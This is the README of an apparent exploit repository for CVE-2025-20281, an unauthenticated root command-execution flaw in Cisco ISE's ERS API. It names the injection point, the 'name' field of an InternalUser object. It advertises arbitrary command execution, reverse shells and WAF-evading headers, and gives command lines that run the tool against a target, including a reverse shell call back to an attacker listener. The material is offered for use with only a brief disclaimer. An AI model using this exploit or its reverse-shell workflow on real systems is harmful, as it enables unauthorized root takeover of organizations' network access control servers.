Unauthenticated Remote Code Execution exploit for CVE-2025-20281 in Cisco ISE ERS API. Execute commands or launch reverse shells as root — no authentication required.# CVE-2025-20281 — Cisco ISE ERS API Unauthenticated RCE Exploit
This repository contains a Python 3 proof-of-concept exploit for **CVE-2025-20281**, a critical vulnerability in **Cisco Identity Services Engine (ISE)** that allows **unauthenticated remote code execution (RCE) as root** via the ERS API.
---
## 🩻 Vulnerability Overview
> The Cisco ISE ERS `/ers/sdk#_` endpoint fails to validate authentication when processing user creation requests.
> By injecting shell commands into the `name` parameter of the `InternalUser` object, attackers can achieve command execution as root.
- **CVE ID**: [CVE-2025-20281](https://nvd.nist.gov/vuln/detail/CVE-2025-20281)
- **Affected**: Cisco ISE PAN (Policy Admin Node) with ERS enabled
- **Severity**: Critical (CVSS 9.8)
- **Authentication**: None required
---
## ⚙️ Features
- ✅ Run arbitrary commands (`--cmd`)
- ✅ Quick test with `--whoami`
- ✅ Launch reverse shells (`--reverse`)
- ✅ No authentication or session token required
- ✅ SSL warning suppression and clean output
- ✅ Legitimate headers to bypass simple WAFs
---
## 🚀 Usage
```bash
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
```
### Examples
Test command:
```
python3 CVE-2025-20281.py 192.168.1.10 --whoami
```
Run custom command:
```
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
```
Reverse shell:
```
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
```
---
⚠️ Legal Disclaimer
This code is provided for educational and authorized testing purposes only.
Do not use this software against networks or systems you do not own or have permission to test.
---
## 🙏 Credits
Vulnerability: Disclosed via Cisco advisory
PoC Refactor: illdeed
[4.0K] /data/pocs/471a0aef8af35d866b84fc39e2827864013870c6
├── [2.2K] CVE-2025-20281.py
├── [1.0K] LICENSE
└── [1.7K] README.md
0 directories, 3 files